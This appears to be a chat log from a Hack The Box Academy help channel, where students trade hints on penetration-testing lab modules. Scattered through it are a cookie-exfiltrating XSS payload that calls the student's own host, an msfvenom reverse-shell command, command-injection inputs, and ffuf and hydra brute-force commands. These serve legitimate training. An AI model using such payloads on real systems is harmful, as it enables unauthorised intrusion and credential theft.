i have noticed sometimes the target doesn't also switch regions when you switch vpns and iirc a hard refresh fixed it for me
Btw I set up a proxy server, it was pretty cool
I’ll try
Use the academy VPN to SSH into your PwnBox. That's how I've managed to avoid a lot of issues.
that's not how that works
LMAO
you do realize the pwnbox has a publicly open interface yeah?
that you can ssh into...
got it fixed, thanks to the both of you
Having this issue in a module: something random is already filled in in the answer section, which doesn't make sense context-wise.
info gathering module got an update recently so if you went through it previously, the old answers are still there due to how the questions are processed/stored on the backend
it's a known thing, and no they can't clear the answers
So, I have to skip them?
you don't have to skip them, i generally advise to do the questions and note down the new answers
as it's still good practice
You can also contact support to ask them whether your answer is correct or not
If your answer field is already filled by previous answers.
Anyone finished the Intro to C2 with Sliver module that could give a nudge!?
lmao what's wrong with attack common service medium
I spent like 1/10 the time in easy to complete medium
doing intro to assembly language (this might be more of a general platform question). how do i actually get the code onto my pwnbox? all the examples show {MY_USER}@htb[/htb]. is this folder already created? can't find it on the pwnbox
Hello guys
Module: Command Injections
Section: Identifying Filters
Link to section: https://academy.hackthebox.com/module/109/section/1035
I think the answer to the question at the end of the section may be incorrect. I know which of the three operators the answer is, since I guessed, but when I tried performing command injection with each of them, I got Invalid Input every time.
Try all other injection operators to see if any of them is not blacklisted. Which of (new-line, &, |) is not blacklisted by the web application?
Could someone verify this?
The answer was correct for me
In the NTLM relay attacks module Advanced NTLM Relay Attacks Targeting AD CS
section did anyone else also face this issue? I reset the box several times and still am unable to complete as I keep getting this error. I also tried it with gettgtpkinit and same error. Google says this means the DC is not configured for kerberos authentication with pfx, so how else can I use the pfx for auth?
It should be right, what all did you do?
I tried these payloads:
||```
127.0.0.1\n
127.0.0.1%26
127.0.0.1|
```||
||what is url encoded new line?||
||```
127.0.0.1&
```||
You can refer the cheatsheet given
Are my payloads incorrect?
You are missing some, yes
Oh, I thought only those payloads need to be used since they're the only ones specified in the question. Cuz they asked which of those in the question work.
With this payload?
||```
127.0.0.1\n
```||
Hint:||You may have to use burp||
I did use burp and those payloads.
Did you try the payloads in the cheatsheet?
try all versions of the "same" payload
I tried both versions of the answer, the encoded and unencoded. Still doesn't work.
Oh, you mean to submit the answer in the learning module portal? the answer is just one of the options given in the brackets
you dont have to type the payload
No, I typed just the answer and got it right. But when I test that answer by putting it in the payload, it doesn't work.
Can I dm you the answer?
I'll DM you answer I have.
Sure
anyone?
I managed to use the certificate using LDAP shell and solved it but I dont think this was the intended solution
nope, it's just a standard. /htb is not a real folder
your pwnbox will be the same for all modules
Hello there ! I'm working on "Whitebox attacks -Type juggling - Authentication Bypass," and I'm stuck.
Does anyone can nudge me?
I am currently doing nmap firewall evasion how do we know the random ips that are generated during a decoy are live or not
haven't done that one personally so i don't know what the lab might be asking for but have you done what nmap docs refer to as an exotic scan? (TCP -sC -sV -sF) type scanning?
@unique ether ^
nmap doc says that is helpful for ascertaining some further information from hosts behind a firewall
It's not lab but a concept I'm not able to get around when decoys are generated
Hi, I'm doing the stored XSS section in the Cross-Site Scripting (XSS) module. I tried many payloads to get the document.cookie, nothing is working.
probably couldn't know. nmap takes from a pool of public ip addresses (not private ones e.g. 192.168xx, 172.16xx, or 10.xx)
link ?
Yup
there is a single example in that section. keep the alert function, put the payload in
don't use window.origin, it will just send you the current url. in the PayloadAllTheThings github sources you have a way to find the cookie
Ahh
I tried alert(document.cookie) within script tag also tried print()
Both didn't work
it works for me
XSS works by injecting javascript code. the <script> tags denote javascript code. put your code into it
remember to take care of syntax, or better yet, copy and paste the given code
Bruh I need to do some research on this
nmap docs are the way
I am actually brain dead rn
Have u finished the path way
when you inject your payload don't click on reset button just enter
probably 6 months but i stopped for a while in-between
if you are talking about the pen testing one
everyone goes for it, but soc is more special imo
Hi
While logging in for the first time we are welcomed with the on-boarding process which states it would provide us with 30 additional cubes. I have skipped this process so can I reclaim my additional 30 cubes back or not. Thanks.
Hi everyone,
I'm currently stuck at the "Information Gathering - Web Edition / Virtual Hosts" stage. -> module/144/section/1257
I have an IP address, 94.237.55.3:52036, with a virtual host named inlanefreight.htb. I added this entry to my /etc/hosts file and removed any other related *.htb entries. I also flushed my DNS cache.
However, when I try to access the website via http://inlanefreight.htb:52036, it doesn’t work. It only loads if I use the IP address directly (http://94.237.55.3:52036/).
My questions:
- I thought that by adding the domain name to /etc/hosts, the domain would be resolved directly, allowing me to access the website without using the IP address. Am I misunderstanding how this should work?
- Because of this issue, I am unable to perform virtual host enumeration. Could anyone offer guidance on how to resolve this problem?
i think you're supposed to add the IP inside the hosts not the domain name
my /etc/hosts file looks something like this
```
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
94.237.55.3 inlanefreight.htb
```
should be correct ?
this are my results
i also tried ffuf:
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://inlanefreight.htb:52036/ -H 'Host: FUZZ.inlanefreight.htb'
i got no results to filter by size, so i dont get it anymore ... XD
nvm i got it
have u tried adding the port inside the hosts file as well? i dont remember if that makes a difference
reset the machine, it was a bug 100%
lol 🤣
i dont think that this is correct. the etc/hosts file is for resolving the domain into ip 🙂

in my case it is working bro
If I had received this answer just 5 minutes before resetting the machine, I would jump from my balcony
"it works on my machine bro" is like the biggest horror sentence after "try to reset the machine" XDDD
you should use pwnbox too
yea man that for sure... I do the same exact things on my vm... not working. I do it on the pwnbox, it works.
hate this shit
sometimes gobuster version is not applicable for --append-domain
thanks brother, have a nice weeknd!
if you try without --append-domain in your VM
it would work
Module Password attacks
Section Pass the Ticket Linux
Question 7 (Julio ticket into smbclient)
I have the flag but it is not being accepted by the platform...again. Need to verify if the flag is correct so I don't waste time
Wrote it manually, copy pasted in notepad then into platform. Nothing
Also the exercise tells you to look for DC01\julio\julio.txt and the only file is flag.txt
cookie already cleared
Kids don't be dumb like me, make sure you connect to the correct SMB Share 🙂
Hi, can someone give me a nudge in the right direction. I am doing SQL Injections fundamentals skill assesment.
I breached through the login form and printed admin username and admin password in the table.
The flag should be in the root directory, but to either create a file or perhaps open it in another way, I need to be authenticated as admin.
I haven't found any endpoint to login at using and I don't think I can use SQL injection to do that.
The question says: Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.
you have to check if the user you've found has write rights (secure_file_priv). if the field is empty then you have the rights. then you have to analyze which directory you have to write to (/var/www/html/repository) and then you can make your payload to write your web shell
guys can anyone help me? ntpdate doesn't work
```
┌──(sam㉿kali)-[~/pdf]
└─$ sudo ntpdate -u dc.intelligence.htb
2024-08-16 20:54:05.189746 (+0300) +25187.331099 +/- 0.122004 dc.intelligence.htb 10.10.10.248 s1 no-leap
CLOCK: time stepped by 25187.331099
2024/08/16 13:54:27 > [!] Tiffany.Molina@intelligence.htb:NewIntelligenceCorpUser9876 - [Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (37) KRB_AP_ERR_SKEW Clock skew too great
```
like bruh
can someone explain this command to me ?
wenum -w /usr/share/secLists/Discovery/Web-Content/common.txt --hc 404 -u "http://IP:PORT/get.php?x=FUZZ"
it's from the web fuzzing module and i can't get through the parameter and value fuzzing
Happy Friday!
Module: Active Directory Enumeration & Attacks
Section: AD Enumeration & Attacks - Skills Assessment Part I
Issue: Cannot get the shell to produce expected output on the box after exploiting the webshell. When running Powershell commands through the shell I get no feedback. What I've done:
- tried different VPNs and switching between attackbox and the HTB VPN
- tried crafting an msfvenom exploit and launching it manually (msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<My_ip> LPORT=<tried many different ports> -f exe > shell.exe)
- tried starting a netcat listener with 'rlwrap'
- tried sending the exploit through Metasploit (exploit/multi/handler) and (payload=windows/x64/meterpreter/reverse_tcp)
- I've tried all of the different reverse Powershell shells that are posted on the reverse shell generator online (including base64, which does grant me a shell, it just doesnt give me any output)
I can get on the box as nt authority\system and get some tools loaded but running the tools or even basic powershell commands gives me exactly 0 output. I know the tools are running because I can see the processes running but I receive no feedback from anything that I input.
After running into these issues I checked some youtube walkthroughs to see if they do anything differently and nothing is done differently at all, I'm just receiving different results.
Any help would be appreciated.
Module : Footprinting
section : SMTP
Hint :On systems usernames are often named after the employee's name. We recommend to use the Footprinting-wordlist provided as resource. Remember that some SMTP servers have higher response
what i've done : I've tried enumeration using smtp-enum but its not producing any result even when timer set to 20 seconds
Module : Web Fuzzing
section: Virtual host and Sub-domain Fuzzing
Question
i did echo the ip with the address of the website into /etc/hosts but still can't visit the site inlanefreight.htb
Hello, this may seem like a stupid question, but I just started the Information Security Foundations path and am in the "operating systems" section and just finished reading about the linux. Am I suppose to be installing linux as I read along or just reading and taking notes?
Couldn't hurt to get a VM with Linux on it
HTB gives you a Parrot OS terminal to be used for modules. However, if you don't have a subscription, you only get one instance to use. A lot of people will download Kali or Parrot to a personal VM and use it instead of getting a subscription
Alright, thank you. Yeah the subscription is quite expensive so that would be a great idea to help save money until I find what I want to learn specifically.
Cheapest subscription is if you're a student. I think I saw it to be $8 a month. I did the monthly subscription which was $18.
Oh I didn't know there was a student subscription. Where can I find that?
just use student email to create account.
you will automatically be able to bill for students prices.
or miss the port at the url end or
miss sudo in the echo >> /etc/hosts
increase -w at 90
hey ichigo, dw, it worked!
hi! I'm trying to use responder from my kali machine using ligolo-ng (LLMNR/NBT-NS Poisoning - from Linux section). I am aware that i need some kind of port forwarding to make it work. However, i have no idea how to do it. ligolo now has the ability to give access to local ports of the target as shown here: https://github.com/nicocha30/ligolo-ng/wiki/Localhost. i have no idea if that is relevant though
also, is there another method or another tool to execute responder from a kali machine instead of using the parrot foothold machine?
So you're trying to do the module on your kali vm?
You'd need a lot of port forwarding
I forget what ports but you can probably look up what ports llmnr poisoning happen on
this is taken from the notes:
UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, UDP 1434, TCP 80, TCP 135, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128, Multicast UDP 5355 and 5353
i think those are the ports youre talking about right?
i have to use responder from the parrot box via ssh. what if the foothold doesn't have responder? can i just upload the python script? Is the python script enough?
I just used the foothold and pivot from there after initial foothold
File transfer module should have taught you how to transfer things
i know how to transfer it
Also iirc responder requires a conf file
but is the python script enough, or do i have to install it like "apt install responder"
Idk if it's included in the .py
okay...
You shouldn't be making changes to machines like installing tools in an engagement
weird... i wonder if the exam gives us a foothold with responder pre-installed
yea... thought so.
yeah ill just try things LOL
The only person you fuck up the env for is you
yeah its not like its a real pentest and i fuck the client network
Module: Information gathering - Web edition
Section: DNS Zone Transfer
I am stuck on this section and was wanting to know if I'm looking too hard by wanting to brute force the nameserver? I can't seem to find it to get the count of the DNS records. I tried using dig axfr @1.1.1.1 inlanefreight.htb and that didn't work.
htb is not a valid TopLevelDomain. Therefore, the resolver 1.1.1.1 cannot resolve this domain. Use the TargetIP
oh wow I didn't know that thank you
didn't work could I bruteforce it to get the top level domain
any hint please
No
Use the spawned ip
I got it thank you thats cool
You should learn how an fqdn is structured btw
sub1.domain.tld
[www].[google].[com]
still looking for help on this if anyone can chime in:
Happy Friday!
Module: Active Directory Enumeration & Attacks
Section: AD Enumeration & Attacks - Skills Assessment Part I
Issue: Cannot get the shell to produce expected output on the box after exploiting the webshell. When running Powershell commands through the shell I get no feedback. What I've done:
- tried different VPNs and switching between attackbox and the HTB VPN
- tried crafting an msfvenom exploit and launching it manually (msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<My_ip> LPORT=<tried many different ports> -f exe > shell.exe)
- tried starting a netcat listener with 'rlwrap'
- tried sending the exploit through Metasploit (exploit/multi/handler) and (payload=windows/x64/meterpreter/reverse_tcp)
- I've tried all of the different reverse Powershell shells that are posted on the reverse shell generator online (including base64, which does grant me a shell, it just doesnt give me any output)
I can get on the box as nt authority\system and get some tools loaded but running the tools or even basic powershell commands gives me exactly 0 output. I know the tools are running because I can see the processes running but I receive no feedback from anything that I input.
After running into these issues I checked some youtube walkthroughs to see if they do anything differently and nothing is done differently at all, I'm just receiving different results.
Any help would be appreciated.
Certain commands won't produce feedback as webshells are heavily limited in the feedback they provide
I understand that, but as stated above, the walkthroughs on youtube are getting feedback and i am not. the feedback is required to enumerate the domain
You shouldn't be watching videos on ad enum module as it's a t1+ module
Those videos break HTB ToS/content guidelines
i didn't make them, i went to them when the lab wasn't working. feel free to direct that to them
And I'm stating, watching those videos is tantamount to cheating
That's how htb sees it
if any non-Karens have actual advice, which you apparently dont, lmk please thank you
Oh fuck off, I was simply informing you not like I pinged mods on it
not looking for SJWs that want to complain about things, just trying to see if this issue is repeatable, thanks again
Well shit I was gonna give actual advice but nah, you want to go to name calling
nah you werent, you have none but thanks lol
I didn't get this role by not being helpful ¯\_(ツ)_/¯
your advice was "some commands arent supposed to give feedback" lol
clearly this is, as stated in the original post
And I was gonna ask what commands have you tried
you werent, you just like being a karen
Aside from the netcat/revshell commands
I get it, it makes you feel important, Im glad you have that going for you, just direct it elsewhere
I'm trying to fucking help you at this point
totally
.
Aside from the ones in your post
anyways, if anyone has advice on that issue much appreciated. is it repeatable from your side, etc. will keep working on it
Also fwiw, any command with revshell that requires the powershell -nop -c you can cut out that part
Since you're already in ps
Also by no output, sometimes windows revshells don't output anything until you hit enter once
But it all depends
Anyone who can help me with the Broken Authentication Skills assessment?
thank you ya I need to review a bunch of stuff
No sorry I'm just a not helpful SJW Karen
(i haven't done this module. Parroting others, don't bruteforce otp)
helps to write what you're stuck on, what you did, ...
I didn't even reach that step. I am stuck on enumerating the users. :))
I used this commands to try to enumerate a good user
ffuf -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -u http://94.237.59.199:46165/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=Password1234" -mc 302 -t 150 -r
ffuf -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -u http://94.237.59.199:46165/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=Password1234" -fr "Invalid credentials." -fs 302
I tried to use the commands presented in the sections of the modules, but no success.
I saw that for a correct login you get a 302 status code.
I am stuck
You used quotes here, not backticks/grave
` not '
hey if nobody can help you you can always use the search tool in discord. There's always really good hints it search all the conversions
On this channel or where?
On this channel
right hand corner of this channel
-fs filters response size, not response code
Web Attacks - Skills Assessment
That is indeed in the academy
Capture every request made and send to repeater
Never know when one is gonna be useful
I figured out that -fs is for size, and then i used -mc, but still nothing.
Did this and I can't see anything that catch my attention.
Wasn't talking to you
is there a different response for valid username but invalid password
Ohh, my bad
I was referring to the dude that said "Web Attacks - Skill Assessment"
Since yk that says nothing about where they're at 
There are 2 "Invalid credentials" - good user, bad password, and "Unknown username or password" - for bad user, bad password.
Need some help with the XSS hijacking, am I supposed to add the scripts in the registration url?
Did that, and after 200 requests, i get all the logins as being good xD
Or should i use -fr in conjunction with -mc?
Read the section and explanations
mc doesn't do much for logins
As you don't get a different code for success/fail auth
what's your regexp filter
Then maybe i have to restart the machine. Because if i use this command:
ffuf -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -u http://94.237.59.199:46165/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=Password1234" -fr "Invalid credentials."
After ~200 logins attempts i get all users as being good, which of course, is not the case.
-fr "Invalid credentials."
you are filtering out responses for good username bad password
change the regexp to the message you get for bad username bad password
I get all usernames as being good if i do that, from the first request send
Hello guys, for anyone has already achieved Advanced SQL Injections - Skill Assessment. May I know why I use aNd will work, but oR or Or does not work?
that should not be the case
Maybe, but it's not the 1st time when I am trying to troubleshoot a problem that doesn't exist. HTB modules machines are not that good...
if it still persists after reset, it's most likely some user error
i don't see anything wrong with your command though
If i were paying for this with my own money I would've been pissed..
Is there any way to filter modules by tier?
After reset it seems that it works...
That is my problem with HTB. If a beginner tries multiple ways of solving a module and one of the solutions he tried was the correct answer, but the machine and lab suck, it is a very bad learning experience...
I guess that after I find a good user, I should find a good password for that user. And then there's that step with the OTP, right?
And nobody is taking this feedback in consideration.
Is that the correct filter? "Invalid credentials."
the regex statement used by the dev is case insensitive.
Sidebar, modules, there's a filter option at the top
It's weird not seeing you as staff. Feels wrong
i am no longer one
Ik but it just feels off 😆
How to configure SMB Null session vulnerability for username and domain enumeration?
I tried a lot through Registry and GPO, but cannot figure it out.
smbclient -N -L //<host>, enum4linux-ng
both oR and Or should work, not sure why they won't.
found the vulnerable input
head hurts, but I'm so glad I'm learning this through HTB
I deleted the picture because it contains spoilers.
Check your domain. You forgot the TLD.
yep I wonder why it is. Cause I did test via online java for the pattern of the filter. It should work... it is weird
Yeah! I remember that! For some reason it's missing now and all I have is the search filter.
Thanks, I'll try again.
Hello. Trying to review hydra commands. Is there something wrong with this command? Hydra is being very slow at going through 100 passwords ...:
hydra -l "b.gates" -P extracted_passwords.txt ssh://94.237.55.3:42396
that's because you're brute-forcing SSH
Hey Calc, since u did the CBBH, can u please give me some tips on what to prep? I am already going through every single exercise for review.. What else should I do? I kind of want to do the white box modules on CWEE for an advantage... Maybe I will learn more about web apps
Yeah it is
the problem is in your query then. send it via dm
anything you learn from CWEE won't help for the exam, as those attacks are all out of scope
especially if you do the whitebox modules
Then what do u suggest
CBBH is bug bounty. blackbox only
What section?
I don't recall using "extracted passwords" for this module
Service Authentication Brute Forcing
Which pass list u used?
The one I generated with cupp
the only suggestions i can give you are:
- understand everything you've been taught; if you don't, review some of the concepts you have trouble with
- have cheat sheets ready. develop a reference book if you can similar to HackTricks (helps in the long-term, you don't have to do it now)
- review the Bug Bounty Hunting Process module to get an idea of how you should write your report
Why did u generate one? Can u show me?
Because that's what's taught by the preceding section
personalized wordlists
Oh right. If I recall correctly, u leave a lot of the options blank. Can u remind me which options are used?
Okay thanks. How about boxes? Are there any that resemble the exam? Or fortress or something?
There's not gonna be anything that resembles the exam
And even if there was, that wouldn't be public considering it'd spoil the exam contents
Everything for the exam is in the course
Reread the previous section it's pretty detailed on what to put in for cupp
there isn't anything like the exam
Thanks I made the wordlist now I am just waiting on it... hydra -l b.gates -P william.txt ssh://94.237.55.3:42396
Can't wait until u can turn multiple module exercises on so I don't have to wait so long for this ...
Even if you could do multiple exercises at once it would actually make the speed lower
Considering you're using bandwidth in multiple places
Need some help again, still doing the hijacking part of XSS. "new Image().src='http://OUR_IP/index.php?c='+document.cookie" I've tried changing this around and still don't get the cookie request. I get the first http request, but it closes. I updated the php and restarted the php listener and still get nothing
Hello, I am stuck in the "Attacking thick applications", I don't know why I do not get the complete window in the Java application...
if someone has completed the module recently I would really appreciate some help...
For Connect to DC1 as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the TargetSid of the bonni user? It hints at event 4771 but the correct ones aren't there? 4776 and 4771 are there, but they don't have the field I need.
Did you set the port to be your port?
I believe the section outlines the steps you'd take to arrive at 4771 based on a few factors
Yes, i can send you my portion if you want
Nah I'm good rn
Did you properly escape the field?
I got the 200 request for the first bit and then it closes
I'll try that
Unless you mean the new image is in your script.js
The payload should be <script src=
its in my script.js
Ah
Then the new image thing is right in there
And you started the listener with php -S?
Your payload should be calling your script.js not your index.php
Your script.js is what sends it off to your index.php
Man, my dashboard just went from 79,98% to 75%.
Are there any modules being released!?
If a module changed/got updated and questions got added, that can happen
Also #academy-announcements <-- there's a few modules here that are planning to replace existing ones in the path
Can someone help me with the Advanced XSS and CSRF? Been stuck a couple of days now 🙂
Yeah... I got this with the Info Gathering.... The completion on the Pentester Path went from 100 to 90 something, but I ended up doing it again for the updated info.
But 4% on a total with no module being launched felt odd
maybe a module got updated ¯_(ツ)_/¯
Go through your list and see
Or a later module you haven't done yet got an update/upgrade which also would affect progress
Yeah... Will do
Yes, I restarted the listener after editing the php file and after I deleted new Image and replaced it with <script src it ran, but didn't give me any cookie
Your js should have the new image()
I was thinking you were doing that in the payload, not the js
Note: payload here is referring to the vulnerable input
Also just to be sure you're doing it in the ||p*p|| field
I have it as vul input=script>VM_ip/vul_input></script> then the rest of the code
Escape the input field (how you discovered it's vuln) then specify http://ip:port/script.js
With the script tag
The js code they give you for script.js works fine (with the replacements)
I've read the section numerous times, and I am still unaware of how to find the answer?
Anyone that has completed "Exploiting Web Vulnerabilities in Thick-Client Applications"
Module/section?
can I pm you what I have, im a little confused
also don't wanna take away from others needing help
Credentials in object properties section, Module is windows attack & defense
Start with 4768
already there
Ah did you attempt to log in with bonni?
Use the fqdn, NOT the ip
yeah I already tried w/ bonni, I'll use fqdn
4771 is failure with kerberos, using the IP is forcing NTLM, which doesn't communicate with kerberos for authentication
Hello all! Has anyone solved LOLBAS: InstallUtil challenge in Intro to Windows Evasion module? Please dm
If someone could help me with the "Exploiting Web Vulnerabilities in Thick-Client Applications" fatty-client.jar module, please DM me
check out the ippsec video
He is following a different approach, I am trying to do it as the module suggests...
besides he is not doing it from the windows machine...
ah ok, my bad then I have not gotten to that part yet
I should stop using the Pwnbox...
though if I recall the video was like what 3 hours long ? I think ippsec covers multiple methods with such a long video
@fathom pendant There's no fqdn field in the logs, I've been going by common error code on event 4625 and 4776
No
Should add that it is the skill assessment I need help with 😅
2 hour video but if I want to try everything that he is doing you would take like 8 hours hahahaha
I meant when you attempt to log in with bonni, use DC1, not the ip
he is super skilled and tries many things in a very short time
Are you in this module as well?!
You do realize he's not making the video in real time as he owns a box right?
The video is from already going through the struggles of fucking it up, taking notes, learning
not yet, getting to attacking common apps soon, and I heard a lot about this thick app section so far, Insane box haha
So far I was ok... but I cannot continue since my java application is missing the lower part and I have no idea why it is showing like this
I have not seen anyone with this issue... maybe it's the windows machine... but when I try from the Pwnbox first I need to download java 8, install it, and even doing the same steps as in the windows machine I can't log in to the application...
so I updated it and have it as vuln_field_name=<script src=VM_ip:port/vuln_input></script><script http://VM_ip:port/script.js><script>new Image and nothing
I've never had experience with HTML
Active Directory Trust Attacks
Active Directory Trust Attacks - Skills Assessment
Is any have any hint to first question:
Gain access to the "Inlanefreight.ad" domain and submit the contents of the flag located in
you don't need that extra script tag
way that it's discovered you just replace the /vuln_input with the /script.js
bloodhound should show you the attack
Is there a way to make this command only show the Account Name instead of whole description?
Get-WinEvent -FilterHashTable @{Logname='Security'; ID=4625} | Select-Object -ExpandProperty Message
probably -Filter samaccountname if that's what the field is, or something like that
the filter parameter isn't a part of either commands 🤔
¯_(ツ)_/¯
either way it shouldn't take long on that module to find the answer; as long as you're looking at the DC
well I did, but I was thinking perhaps there is a faster way
thank you anyways!
maybe | findstr "samaccountname"
no no, I don't have a specific user to search instead I had to find the user which had most failed logins
In DACL 1, + 2 Use the Managers group privileges to abuse the company's CEO's account chap, and gain access to the shared folder \DC01\CEO, without changing the CEO's password. Submit the contents of flag.txt as the answer.
please help I added Lilia to Managers
but I don't know what to do next. Managers doesn't have rights over CEO.
How do I know who's the CEO? I thought about looping over all users but it takes a long time; there are 2900+
Or how do I access the share without knowing.
...
samaccountname is the field in which a username is held
wait findstr works on properties?
so now i have VM_ip:port/script.js></script> new...etc and it comes back with a 404 message
skill assessment? dacl 1 or dacl 2?
I think this can happen sometimes, restart the machine
Using the known subdomains for inlanefreight.com (www, ns1, ns2, ns3, blog, support, customer), find any missing subdomains by brute-forcing possible domain names. Provide your answer with the complete subdomain, e.g., www.inlanefreight.com.
please give me the answer
maybe you need to do a pass the cert instead of the kerberos auth with adcs